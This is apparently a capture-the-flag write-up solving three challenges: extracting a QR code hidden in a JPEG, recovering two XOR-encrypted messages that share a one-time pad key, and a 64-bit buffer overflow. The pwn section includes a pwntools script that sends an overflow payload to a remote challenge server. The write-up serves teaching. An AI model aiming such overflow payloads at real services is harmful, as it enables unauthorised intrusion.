Steganography

Small icon much wow

We got an image stego.jpg.

Running binwalk on it shows that another .jpg file is embedded inside.

Using the command dd if=stego.jpg of=stego1.jpg skip=202 bs=1, we can extract the hidden image.

The hidden image is a QR code. Scanning it gives the flag d4rk{flAg_h1dd3n_1n_th3_thumbnail}c0de.


Crypto

OTP

hackerman is so dank that he decided to play around with OTPs.
he did the following:
message1 ^ key = cipher1
message2 ^ key = cipher2
He gives you cipher1 and cipher2 and challenges you to find the concatenation of messages 1 and 2.
Are you dank enough to find this?
Oh and also, ‘meme’ is so popular that hackerman used the word in both his messages.
cipher1 is ‘\x05F\x17\x12\x14\x18\x01\x0c\x0b4’
cipher2 is ‘>\x1f\x00\x14\n\x08\x07Q\n\x0e’
Both without quotes

Because the same key is used for both messages, it cancels out when the two ciphertexts are XORed:

cipher1 ^ cipher2 = message1 ^ message2

Executing the program below, we can find the flag d4rk{meme__meme}c0de.

# cipher1 = '\x05F\x17\x12\x14\x18\x01\x0c\x0b4'
# cipher2 = '>\x1f\x00\x14\n\x08\x07Q\n\x0e'
cipher1 = bytes.fromhex('054617121418010c0b34')
cipher2 = bytes.fromhex('3e1f00140a0807510a0e')


def xor(a, b):
    # Byte-wise XOR of two equal-length byte strings
    return bytes(x ^ y for x, y in zip(a, b))


# The key cancels out: cipher1 ^ cipher2 = message1 ^ message2
m1_xor_m2 = xor(cipher1, cipher2)
print(m1_xor_m2.hex())

# 3b5917061e10065d013a

# Each message is 10 bytes, so the flag wrapper is split across the two:
# message1 = d4rk{Xmeme | d4rk{memeX
# message2 = Xmeme}c0de | memeX}c0de

# The known start of message1 reveals the start of message2, and the
# known end of message2 reveals the end of message1.
m2_front = xor(m1_xor_m2[:5], b"d4rk{").decode()
m1_back = xor(m1_xor_m2[5:], b"}c0de").decode()

m1 = "d4rk{" + m1_back
m2 = m2_front + "}c0de"

print(m1 + m2)
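
The same attack in a more general form, as an added example that is not part of the original writeup: every guessed plaintext byte fixes one key byte, which then decrypts the other message at that position, and contradictory guesses are rejected. The function names recover_key, decrypt and solve are hypothetical; the ciphertexts and the flag wrapper come from the challenge above.

```python
# Ciphertexts from the challenge statement (one key, two messages).
C1 = bytes.fromhex("054617121418010c0b34")
C2 = bytes.fromhex("3e1f00140a0807510a0e")


def recover_key(ciphers, known):
    """known: (message index, offset, plaintext bytes) guesses.
    Every guessed plaintext byte fixes one key byte (key = cipher ^ plain).
    Returns the key as a list, None where unknown; raises ValueError when
    two guesses imply different values for the same key byte."""
    key = [None] * len(ciphers[0])
    for msg, off, plain in known:
        for i, p in enumerate(plain):
            k = ciphers[msg][off + i] ^ p
            if key[off + i] not in (None, k):
                raise ValueError(f"guesses disagree on key byte {off + i}")
            key[off + i] = k
    return key


def decrypt(cipher, key):
    """Decrypt with a partial key, showing '?' for unknown positions."""
    return "".join("?" if k is None else chr(c ^ k) for c, k in zip(cipher, key))


def solve():
    # Known plaintext: the flag wrapper opens message1 and closes message2.
    known = [(0, 0, b"d4rk{"), (1, 5, b"}c0de")]
    key = recover_key((C1, C2), known)
    m1, m2 = decrypt(C1, key), decrypt(C2, key)
    # The hint says both messages contain 'meme'; use it as a sanity check.
    if "meme" not in m1 or "meme" not in m2:
        raise ValueError("recovered plaintext does not match the hint")
    return bytes(key), m1, m2


if __name__ == "__main__":
    key, m1, m2 = solve()
    print("key     :", key)
    print("message1:", m1)
    print("message2:", m2)
    # The prefix alone already leaks half of message2.
    print(decrypt(C2, recover_key((C1, C2), [(0, 0, b"d4rk{")])))
```
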

Pwn

baby b0f

We got a 64-bit executable q1.

Using Ghidra, we can decompile its main function.

If we overwrite local_c with the value 0xdeadbeef, we get the flag d4rk{W3lc0me_t0_th3_w0rld_0f_pwn}c0de.

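from pwn import *

p = remote('68.183.158.95', 8989)

# 10 bytes of padding, then the 64-bit value that lands in local_c.
# Byte strings are used so the script also runs under Python 3.
s = b''
s += b"A"*8 + b"A"*2 + p64(0xdeadbeef)

p.sendline(s)

p.interactive()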